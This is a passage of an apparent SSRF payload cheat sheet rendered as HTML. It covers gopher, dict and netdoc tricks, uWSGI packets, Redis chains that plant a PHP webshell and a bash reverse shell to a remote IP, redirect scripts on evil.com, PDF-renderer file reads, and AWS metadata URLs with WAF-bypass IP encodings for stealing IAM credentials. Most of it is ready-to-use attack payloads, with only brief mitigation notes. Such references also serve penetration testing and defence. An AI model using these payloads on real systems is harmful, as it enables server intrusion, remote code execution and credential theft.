<a id="__codelineno-29-13" name="__codelineno-29-13" href="#__codelineno-29-13"></a><span class="n">You</span> <span class="n">didn</span><span class="err">&#39;</span><span class="n">t</span> <span class="n">say</span> <span class="n">the</span> <span class="n">magic</span> <span class="n">word</span> <span class="p">!</span>
<a id="__codelineno-29-14" name="__codelineno-29-14" href="#__codelineno-29-14"></a>
<a id="__codelineno-29-15" name="__codelineno-29-15" href="#__codelineno-29-15"></a>
<a id="__codelineno-29-16" name="__codelineno-29-16" href="#__codelineno-29-16"></a><span class="p">.</span>
<a id="__codelineno-29-17" name="__codelineno-29-17" href="#__codelineno-29-17"></a><span class="n">QUIT</span>
</code></pre></div>
<h4 id="gopher-http">Gopher HTTP</h4>
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a><span class="n">gopher</span><span class="p">://&lt;</span><span class="n">proxyserver</span><span class="p">&gt;:</span><span class="n">8080</span><span class="p">/</span><span class="n">_GET</span> <span class="n">http</span><span class="p">://&lt;</span><span class="n">attacker</span><span class="p">:</span><span class="n">80</span><span class="p">&gt;/</span><span class="n">x</span> <span class="n">HTTP</span><span class="p">/</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="k">%</span><span class="n">0A</span><span class="k">%</span><span class="n">0A</span>
<a id="__codelineno-30-2" name="__codelineno-30-2" href="#__codelineno-30-2"></a><span class="n">gopher</span><span class="p">://&lt;</span><span class="n">proxyserver</span><span class="p">&gt;:</span><span class="n">8080</span><span class="p">/</span><span class="n">_POST</span><span class="k">%</span><span class="n">20http</span><span class="p">://&lt;</span><span class="n">attacker</span><span class="p">&gt;:</span><span class="n">80</span><span class="p">/</span><span class="n">x</span><span class="k">%</span><span class="n">20HTTP</span><span class="p">/</span><span class="n">1</span><span class="p">.</span><span class="n">1</span><span class="k">%</span><span class="n">0ACookie</span><span class="p">:</span><span class="k">%</span><span class="n">20eatme</span><span class="k">%</span><span class="n">0A</span><span class="k">%</span><span class="n">0AI</span><span class="p">+</span><span class="n">am</span><span class="p">+</span><span class="n">a</span><span class="p">+</span><span class="n">post</span><span class="p">+</span><span class="n">body</span>
</code></pre></div>
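<h4 id="gopher-smtp-back-connect-to-1337">Gopher SMTP - Back connect to 1337</h4>
<p>The redirect examples do not send <code>gopher://</code> directly: the vulnerable application is given an ordinary <code>http://</code> URL, and the server behind that URL answers with a <code>Location</code> header pointing at <code>gopher://</code>. A fetcher that validates only the first URL and then follows redirects is exposed. Disabling redirect following, or re-validating scheme and destination on every hop, blocks this.</p>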
<div class="highlight"><pre><span></span><code><a id="__codelineno-31-1" name="__codelineno-31-1" href="#__codelineno-31-1"></a><span class="x">Content of evil.com/redirect.php:</span>
<a id="__codelineno-31-2" name="__codelineno-31-2" href="#__codelineno-31-2"></a><span class="cp">&lt;?php</span>
<a id="__codelineno-31-3" name="__codelineno-31-3" href="#__codelineno-31-3"></a><span class="nb">header</span><span class="p">(</span><span class="s2">&quot;Location: gopher://hack3r.site:1337/_SSRF%0ATest!&quot;</span><span class="p">);</span>
<a id="__codelineno-31-4" name="__codelineno-31-4" href="#__codelineno-31-4"></a><span class="cp">?&gt;</span>
<a id="__codelineno-31-5" name="__codelineno-31-5" href="#__codelineno-31-5"></a>
<a id="__codelineno-31-6" name="__codelineno-31-6" href="#__codelineno-31-6"></a><span class="x">Now query it.</span>
<a id="__codelineno-31-7" name="__codelineno-31-7" href="#__codelineno-31-7"></a><span class="x">https://example.com/?q=http://evil.com/redirect.php.</span>
</code></pre></div>
<h4 id="gopher-smtp-send-a-mail">Gopher SMTP - send a mail</h4>
<div class="highlight"><pre><span></span><code><a id="__codelineno-32-1" name="__codelineno-32-1" href="#__codelineno-32-1"></a><span class="x">Content of evil.com/redirect.php:</span>
<a id="__codelineno-32-2" name="__codelineno-32-2" href="#__codelineno-32-2"></a><span class="cp">&lt;?php</span>
<a id="__codelineno-32-3" name="__codelineno-32-3" href="#__codelineno-32-3"></a> <span class="nv">$commands</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span>
<a id="__codelineno-32-4" name="__codelineno-32-4" href="#__codelineno-32-4"></a> <span class="s1">&#39;HELO victim.com&#39;</span><span class="p">,</span>
<a id="__codelineno-32-5" name="__codelineno-32-5" href="#__codelineno-32-5"></a> <span class="s1">&#39;MAIL FROM: &lt;admin@victim.com&gt;&#39;</span><span class="p">,</span>
<a id="__codelineno-32-6" name="__codelineno-32-6" href="#__codelineno-32-6"></a> <span class="s1">&#39;RCPT To: &lt;sxcurity@oou.us&gt;&#39;</span><span class="p">,</span>
<a id="__codelineno-32-7" name="__codelineno-32-7" href="#__codelineno-32-7"></a> <span class="s1">&#39;DATA&#39;</span><span class="p">,</span>
<a id="__codelineno-32-8" name="__codelineno-32-8" href="#__codelineno-32-8"></a> <span class="s1">&#39;Subject: @sxcurity!&#39;</span><span class="p">,</span>
<a id="__codelineno-32-9" name="__codelineno-32-9" href="#__codelineno-32-9"></a> <span class="s1">&#39;Corben was here, woot woot!&#39;</span><span class="p">,</span>
<a id="__codelineno-32-10" name="__codelineno-32-10" href="#__codelineno-32-10"></a> <span class="s1">&#39;.&#39;</span>
<a id="__codelineno-32-11" name="__codelineno-32-11" href="#__codelineno-32-11"></a> <span class="p">);</span>
<a id="__codelineno-32-12" name="__codelineno-32-12" href="#__codelineno-32-12"></a>
<a id="__codelineno-32-13" name="__codelineno-32-13" href="#__codelineno-32-13"></a> <span class="nv">$payload</span> <span class="o">=</span> <span class="nb">implode</span><span class="p">(</span><span class="s1">&#39;%0A&#39;</span><span class="p">,</span> <span class="nv">$commands</span><span class="p">);</span>
<a id="__codelineno-32-14" name="__codelineno-32-14" href="#__codelineno-32-14"></a>
<a id="__codelineno-32-15" name="__codelineno-32-15" href="#__codelineno-32-15"></a> <span class="nb">header</span><span class="p">(</span><span class="s1">&#39;Location: gopher://0:25/_&#39;</span><span class="o">.</span><span class="nv">$payload</span><span class="p">);</span>
<a id="__codelineno-32-16" name="__codelineno-32-16" href="#__codelineno-32-16"></a><span class="cp">?&gt;</span>
</code></pre></div>
<h3 id="netdoc">Netdoc</h3>
<p>Wrapper for Java when your payloads struggle with "\n" and "\r" characters.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-33-1" name="__codelineno-33-1" href="#__codelineno-33-1"></a><span class="n">ssrf</span><span class="p">.</span><span class="n">php</span><span class="k">?</span><span class="n">url</span><span class="p">=</span><span class="n">netdoc</span><span class="p">:///</span><span class="n">etc</span><span class="p">/</span><span class="n">passwd</span>
</code></pre></div>
<h2 id="ssrf-exploiting-wsgi">SSRF exploiting WSGI</h2>
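<p>Exploit using the Gopher protocol; the full exploit script is available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py. The tables below decode the bytes of the example: a 4-byte packet header followed by one key/value variable. Lengths are little-endian, and the datasize of 26 is the size of the variable block (2 + 10 + 2 + 12 bytes). The request needs the uwsgi socket to listen on TCP (port 8000 here); binding it to a Unix domain socket takes it out of reach of URL-based fetches.</p>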
<div class="highlight"><pre><span></span><code><a id="__codelineno-34-1" name="__codelineno-34-1" href="#__codelineno-34-1"></a><span class="n">gopher</span><span class="p">://</span><span class="n">localhost</span><span class="p">:</span><span class="n">8000</span><span class="p">/</span><span class="n">_</span><span class="k">%</span><span class="n">00</span><span class="k">%</span><span class="n">1A</span><span class="k">%</span><span class="n">00</span><span class="k">%</span><span class="n">00</span><span class="k">%</span><span class="n">0A</span><span class="k">%</span><span class="n">00UWSGI_FILE</span><span class="k">%</span><span class="n">0C</span><span class="k">%</span><span class="n">00</span><span class="p">/</span><span class="n">tmp</span><span class="p">/</span><span class="n">test</span><span class="p">.</span><span class="n">py</span>
</code></pre></div>
<table>
<thead>
<tr>
<th>Header</th>
<th></th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>modifier1</td>
<td>(1 byte)</td>
<td>0 (%00)</td>
</tr>
<tr>
<td>datasize</td>
<td>(2 bytes)</td>
<td>26 (%1A%00)</td>
</tr>
<tr>
<td>modifier2</td>
<td>(1 byte)</td>
<td>0 (%00)</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Variable (UWSGI_FILE)</th>
<th></th>
<th></th>
<th></th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>key length</td>
<td>(2 bytes)</td>
<td>10</td>
<td>(%0A%00)</td>
<td></td>
</tr>
<tr>
<td>key data</td>
<td>(m bytes)</td>
<td></td>
<td>UWSGI_FILE</td>
<td></td>
</tr>
<tr>
<td>value length</td>
<td>(2 bytes)</td>
<td>12</td>
<td>(%0C%00)</td>
<td></td>
</tr>
<tr>
<td>value data</td>
<td>(n bytes)</td>
<td></td>
<td>/tmp/test.py</td>
<td></td>
</tr>
</tbody>
</table>
<h2 id="ssrf-exploiting-redis">SSRF exploiting Redis</h2>
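<blockquote>
<p>Redis is a database system that stores everything in RAM</p>
</blockquote>
<p>Both sequences below need a Redis instance that accepts unauthenticated commands from the server and runs as a user that can write to the web root. They repoint the dump directory and file name with <code>CONFIG SET</code>, store the payload as a value, and let <code>SAVE</code> write it to disk. Requiring authentication, disabling or renaming <code>CONFIG</code>, and denying the Redis user write access to served directories each break the chain.</p>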
<div class="highlight"><pre><span></span><code><a id="__codelineno-35-1" name="__codelineno-35-1" href="#__codelineno-35-1"></a><span class="c"># Getting a webshell</span>
<a id="__codelineno-35-2" name="__codelineno-35-2" href="#__codelineno-35-2"></a><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">CONFIG</span><span class="k">%</span><span class="n">20SET</span><span class="k">%</span><span class="n">20dir</span><span class="k">%</span><span class="n">20</span><span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">www</span><span class="p">/</span><span class="n">html</span>
<a id="__codelineno-35-3" name="__codelineno-35-3" href="#__codelineno-35-3"></a><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">CONFIG</span><span class="k">%</span><span class="n">20SET</span><span class="k">%</span><span class="n">20dbfilename</span><span class="k">%</span><span class="n">20file</span><span class="p">.</span><span class="n">php</span>
<a id="__codelineno-35-4" name="__codelineno-35-4" href="#__codelineno-35-4"></a><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">SET</span><span class="k">%</span><span class="n">20mykey</span><span class="k">%</span><span class="n">20</span><span class="s2">&quot;&lt;\x3Fphp system($_GET[0])\x3F&gt;&quot;</span>
<a id="__codelineno-35-5" name="__codelineno-35-5" href="#__codelineno-35-5"></a><span class="n">url</span><span class="p">=</span><span class="n">dict</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">SAVE</span>
<a id="__codelineno-35-6" name="__codelineno-35-6" href="#__codelineno-35-6"></a>
<a id="__codelineno-35-7" name="__codelineno-35-7" href="#__codelineno-35-7"></a><span class="c"># Getting a PHP reverse shell</span>
<a id="__codelineno-35-8" name="__codelineno-35-8" href="#__codelineno-35-8"></a><span class="n">gopher</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">_config</span><span class="k">%</span><span class="n">20set</span><span class="k">%</span><span class="n">20dir</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">2Fvar</span><span class="k">%</span><span class="n">2Fwww</span><span class="k">%</span><span class="n">2Fhtml</span>
<a id="__codelineno-35-9" name="__codelineno-35-9" href="#__codelineno-35-9"></a><span class="n">gopher</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">_config</span><span class="k">%</span><span class="n">20set</span><span class="k">%</span><span class="n">20dbfilename</span><span class="k">%</span><span class="n">20reverse</span><span class="p">.</span><span class="n">php</span>
<a id="__codelineno-35-10" name="__codelineno-35-10" href="#__codelineno-35-10"></a><span class="n">gopher</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">_set</span><span class="k">%</span><span class="n">20payload</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">22</span><span class="k">%</span><span class="n">3C</span><span class="k">%</span><span class="n">3Fphp</span><span class="k">%</span><span class="n">20shell_exec</span><span class="k">%</span><span class="n">28</span><span class="k">%</span><span class="n">27bash</span><span class="k">%</span><span class="n">20-i</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">26</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">2Fdev</span><span class="k">%</span><span class="n">2Ftcp</span><span class="k">%</span><span class="n">2FREMOTE_IP</span><span class="k">%</span><span class="n">2FREMOTE_PORT</span><span class="k">%</span><span class="n">200</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">261</span><span class="k">%</span><span class="n">27</span><span class="k">%</span><span class="n">29</span><span class="k">%</span><span class="n">3B</span><span class="k">%</span><span class="n">3F</span><span class="k">%</span><span class="n">3E</span><span class="k">%</span><span class="n">22</span>
<a id="__codelineno-35-11" name="__codelineno-35-11" href="#__codelineno-35-11"></a><span class="n">gopher</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">6379</span><span class="p">/</span><span class="n">_save</span>
</code></pre></div>
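<h2 id="ssrf-exploiting-pdf-file">SSRF exploiting PDF file</h2>
<p>HTML-to-PDF converters render user-supplied markup on the server, so every resource that markup references (links, attachments, script requests) is fetched with the server's file and network access. Rendering untrusted HTML in a sandbox that has no local-file or internal-network access removes the exposure.</p>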
<p><img alt="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png" src="https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png" /></p>
<p>Example with <a href="https://www.youtube.com/watch?v=t5fB6OZsR6c&amp;feature=emb_title">WeasyPrint by @nahamsec</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-36-1" name="__codelineno-36-1" href="#__codelineno-36-1"></a><span class="p">&lt;</span><span class="n">link</span> <span class="n">rel</span><span class="p">=</span><span class="n">attachment</span> <span class="n">href</span><span class="p">=</span><span class="s2">&quot;file:///root/secret.txt&quot;</span><span class="p">&gt;</span>
</code></pre></div>
<p>Example with PhantomJS </p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-37-1" name="__codelineno-37-1" href="#__codelineno-37-1"></a><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span>
<a id="__codelineno-37-2" name="__codelineno-37-2" href="#__codelineno-37-2"></a><span class="w"> </span><span class="nx">exfil</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="ow">new</span><span class="w"> </span><span class="nx">XMLHttpRequest</span><span class="p">();</span>
<a id="__codelineno-37-3" name="__codelineno-37-3" href="#__codelineno-37-3"></a><span class="w"> </span><span class="nx">exfil</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">&quot;GET&quot;</span><span class="p">,</span><span class="s2">&quot;file:///etc/passwd&quot;</span><span class="p">);</span>
<a id="__codelineno-37-4" name="__codelineno-37-4" href="#__codelineno-37-4"></a><span class="w"> </span><span class="nx">exfil</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span>
<a id="__codelineno-37-5" name="__codelineno-37-5" href="#__codelineno-37-5"></a><span class="w"> </span><span class="nx">exfil</span><span class="p">.</span><span class="nx">onload</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="p">(){</span><span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">responseText</span><span class="p">);}</span>
<a id="__codelineno-37-6" name="__codelineno-37-6" href="#__codelineno-37-6"></a><span class="w"> </span><span class="nx">exfil</span><span class="p">.</span><span class="nx">onerror</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="p">(){</span><span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="s1">&#39;failed!&#39;</span><span class="p">)}</span>
<a id="__codelineno-37-7" name="__codelineno-37-7" href="#__codelineno-37-7"></a><span class="o">&lt;</span><span class="err">/script&gt;</span>
</code></pre></div>
<h2 id="blind-ssrf">Blind SSRF</h2>
<blockquote>
<p>When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. </p>
</blockquote>
<p>Use an SSRF chain to gain an Out-of-Band output.</p>
<p>From https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/ / https://github.com/assetnote/blind-ssrf-chains</p>
<p><strong>Possible via HTTP(s)</strong></p>
<ul>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#elasticsearch">Elasticsearch</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#weblogic">Weblogic</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#consul">Hashicorp Consul</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#shellshock">Shellshock</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#druid">Apache Druid</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#solr">Apache Solr</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#peoplesoft">PeopleSoft</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#struts">Apache Struts</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#jboss">JBoss</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#confluence">Confluence</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#jira">Jira</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#atlassian-products">Other Atlassian Products</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#opentsdb">OpenTSDB</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#jenkins">Jenkins</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#hystrix">Hystrix Dashboard</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#w3">W3 Total Cache</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#docker">Docker</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#redisexporter">Gitlab Prometheus Redis Exporter</a></li>
</ul>
<p><strong>Possible via Gopher</strong></p>
<ul>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#redis">Redis</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#memcache">Memcache</a></li>
<li><a href="https://github.com/assetnote/blind-ssrf-chains#tomcat">Apache Tomcat</a></li>
</ul>
<h2 id="ssrf-to-xss">SSRF to XSS</h2>
<p>by <a href="https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158">@D0rkerDevil &amp; @alyssa.o.herrera</a></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-38-1" name="__codelineno-38-1" href="#__codelineno-38-1"></a>http://brutelogic.com.br/poc.svg<span class="w"> </span>-&gt;<span class="w"> </span>simple<span class="w"> </span>alert
<a id="__codelineno-38-2" name="__codelineno-38-2" href="#__codelineno-38-2"></a>https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri<span class="o">=</span><span class="w"> </span>-&gt;<span class="w"> </span>simple<span class="w"> </span>ssrf
<a id="__codelineno-38-3" name="__codelineno-38-3" href="#__codelineno-38-3"></a>
<a id="__codelineno-38-4" name="__codelineno-38-4" href="#__codelineno-38-4"></a>https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri<span class="o">=</span>http://brutelogic.com.br/poc.svg
</code></pre></div>
<h2 id="ssrf-from-xss">SSRF from XSS</h2>
<h3 id="using-an-iframe">Using an iframe</h3>
<p>This applies when the injected HTML is rendered server-side into a PDF: the content of the file will be integrated inside the PDF as an image or text.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-39-1" name="__codelineno-39-1" href="#__codelineno-39-1"></a><span class="p">&lt;</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">&quot;echopwn&quot;</span> <span class="na">onerror</span><span class="o">=</span><span class="s">&quot;document.write(&#39;&lt;iframe src=file:///etc/passwd&gt;&lt;/iframe&gt;&#39;)&quot;</span><span class="p">/&gt;</span>
</code></pre></div>
<h3 id="using-an-attachment">Using an attachment</h3>
<p>Example of a PDF attachment using HTML </p>
<ol>
<li>use <code>&lt;link rel=attachment href="URL"&gt;</code> as Bio text</li>
<li>use 'Download Data' feature to get PDF</li>
<li>use <code>pdfdetach -saveall filename.pdf</code> to extract embedded resource</li>
<li><code>cat attachment.bin</code></li>
</ol>
<h2 id="ssrf-url-for-cloud-instances">SSRF URL for Cloud Instances</h2>
<h3 id="ssrf-url-for-aws">SSRF URL for AWS</h3>
<p>The AWS Instance Metadata Service is a service available within Amazon EC2 instances that allows those instances to access metadata about themselves. - <a href="http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories">Docs</a></p>
<ul>
<li>IPv4 endpoint (old): <code>http://169.254.169.254/latest/meta-data/</code></li>
<li>
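<p>IPv4 endpoint (new, IMDSv2) requires the header <code>X-aws-ec2-metadata-token</code>, whose value is a session token first obtained with a <code>PUT</code> request. An instance that enforces IMDSv2 therefore rejects the plain <code>GET</code> requests listed for the old endpoint.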
<div class="highlight"><pre><span></span><code><a id="__codelineno-40-1" name="__codelineno-40-1" href="#__codelineno-40-1"></a><span class="n">export</span> <span class="n">TOKEN</span><span class="p">=`</span><span class="nb">curl </span><span class="n">-X</span> <span class="n">PUT</span> <span class="n">-H</span> <span class="s2">&quot;X-aws-ec2-metadata-token-ttl-seconds: 21600&quot;</span> <span class="s2">&quot;http://169.254.169.254/latest/api/token&quot;</span><span class="p">`</span>
<a id="__codelineno-40-2" name="__codelineno-40-2" href="#__codelineno-40-2"></a><span class="nb">curl </span><span class="n">-H</span> <span class="s2">&quot;X-aws-ec2-metadata-token:$TOKEN&quot;</span> <span class="n">-v</span> <span class="s2">&quot;http://169.254.169.254/latest/meta-data&quot;</span>
</code></pre></div></p>
</li>
<li>
<p>IPv6 endpoint: <code>http://[fd00:ec2::254]/latest/meta-data/</code> </p>
</li>
</ul>
<p>In case of a WAF, you might want to try different ways to connect to the API.
* DNS record pointing to the AWS API IP
<div class="highlight"><pre><span></span><code><a id="__codelineno-41-1" name="__codelineno-41-1" href="#__codelineno-41-1"></a><span class="n">http</span><span class="p">://</span><span class="n">instance-data</span>
<a id="__codelineno-41-2" name="__codelineno-41-2" href="#__codelineno-41-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span>
<a id="__codelineno-41-3" name="__codelineno-41-3" href="#__codelineno-41-3"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">nip</span><span class="p">.</span><span class="n">io</span><span class="p">/</span>
</code></pre></div>
* HTTP redirect
<div class="highlight"><pre><span></span><code><a id="__codelineno-42-1" name="__codelineno-42-1" href="#__codelineno-42-1"></a><span class="n">Static</span><span class="p">:</span><span class="n">http</span><span class="p">://</span><span class="n">nicob</span><span class="p">.</span><span class="n">net</span><span class="p">/</span><span class="n">redir6a</span>
<a id="__codelineno-42-2" name="__codelineno-42-2" href="#__codelineno-42-2"></a><span class="n">Dynamic</span><span class="p">:</span><span class="n">http</span><span class="p">://</span><span class="n">nicob</span><span class="p">.</span><span class="n">net</span><span class="p">/</span><span class="n">redir-http</span><span class="p">-</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">:</span><span class="n">80</span><span class="p">-</span>
</code></pre></div>
* Encoding the IP to bypass WAF
<div class="highlight"><pre><span></span><code><a id="__codelineno-43-1" name="__codelineno-43-1" href="#__codelineno-43-1"></a><span class="n">http</span><span class="p">://</span><span class="n">425</span><span class="p">.</span><span class="n">510</span><span class="p">.</span><span class="n">425</span><span class="p">.</span><span class="n">510</span> <span class="n">Dotted</span> <span class="n">decimal</span> <span class="n">with</span> <span class="n">overflow</span>
<a id="__codelineno-43-2" name="__codelineno-43-2" href="#__codelineno-43-2"></a><span class="n">http</span><span class="p">://</span><span class="n">2852039166</span> <span class="n">Dotless</span> <span class="n">decimal</span>
<a id="__codelineno-43-3" name="__codelineno-43-3" href="#__codelineno-43-3"></a><span class="n">http</span><span class="p">://</span><span class="n">7147006462</span> <span class="n">Dotless</span> <span class="n">decimal</span> <span class="n">with</span> <span class="n">overflow</span>
<a id="__codelineno-43-4" name="__codelineno-43-4" href="#__codelineno-43-4"></a><span class="n">http</span><span class="p">://</span><span class="n">0xA9</span><span class="p">.</span><span class="n">0xFE</span><span class="p">.</span><span class="n">0xA9</span><span class="p">.</span><span class="n">0xFE</span> <span class="n">Dotted</span> <span class="n">hexadecimal</span>
<a id="__codelineno-43-5" name="__codelineno-43-5" href="#__codelineno-43-5"></a><span class="n">http</span><span class="p">://</span><span class="n">0xA9FEA9FE</span> <span class="n">Dotless</span> <span class="n">hexadecimal</span>
<a id="__codelineno-43-6" name="__codelineno-43-6" href="#__codelineno-43-6"></a><span class="n">http</span><span class="p">://</span><span class="n">0x41414141A9FEA9FE</span> <span class="n">Dotless</span> <span class="n">hexadecimal</span> <span class="n">with</span> <span class="n">overflow</span>
<a id="__codelineno-43-7" name="__codelineno-43-7" href="#__codelineno-43-7"></a><span class="n">http</span><span class="p">://</span><span class="n">0251</span><span class="p">.</span><span class="n">0376</span><span class="p">.</span><span class="n">0251</span><span class="p">.</span><span class="n">0376</span> <span class="n">Dotted</span> <span class="n">octal</span>
<a id="__codelineno-43-8" name="__codelineno-43-8" href="#__codelineno-43-8"></a><span class="n">http</span><span class="p">://</span><span class="n">0251</span><span class="p">.</span><span class="n">00376</span><span class="p">.</span><span class="n">000251</span><span class="p">.</span><span class="n">0000376</span> <span class="n">Dotted</span> <span class="n">octal</span> <span class="n">with</span> <span class="n">padding</span>
<a id="__codelineno-43-9" name="__codelineno-43-9" href="#__codelineno-43-9"></a><span class="n">http</span><span class="p">://</span><span class="n">0251</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span> <span class="n">Mixed</span> <span class="n">encoding</span> <span class="p">(</span><span class="n">dotted</span> <span class="n">octal</span> <span class="p">+</span> <span class="n">dotted</span> <span class="n">decimal</span><span class="p">)</span>
<a id="__codelineno-43-10" name="__codelineno-43-10" href="#__codelineno-43-10"></a><span class="n">http</span><span class="p">://[::</span><span class="n">ffff</span><span class="p">:</span><span class="n">a9fe</span><span class="p">:</span><span class="n">a9fe</span><span class="p">]</span> <span class="n">IPV6</span> <span class="n">Compressed</span>
<a id="__codelineno-43-11" name="__codelineno-43-11" href="#__codelineno-43-11"></a><span class="n">http</span><span class="p">://[</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">ffff</span><span class="p">:</span><span class="n">a9fe</span><span class="p">:</span><span class="n">a9fe</span><span class="p">]</span> <span class="n">IPV6</span> <span class="n">Expanded</span>
<a id="__codelineno-43-12" name="__codelineno-43-12" href="#__codelineno-43-12"></a><span class="n">http</span><span class="p">://[</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">0</span><span class="p">:</span><span class="n">ffff</span><span class="p">:</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">]</span> <span class="n">IPV6</span><span class="p">/</span><span class="n">IPV4</span>
<a id="__codelineno-43-13" name="__codelineno-43-13" href="#__codelineno-43-13"></a><span class="n">http</span><span class="p">://[</span><span class="n">fd00</span><span class="p">:</span><span class="n">ec2</span><span class="p">::</span><span class="n">254</span><span class="p">]</span> <span class="n">IPV6</span>
</code></pre></div></p>
<p>These URLs return a list of IAM roles associated with the instance. You can then append the role name to this URL to retrieve the security credentials for the role.
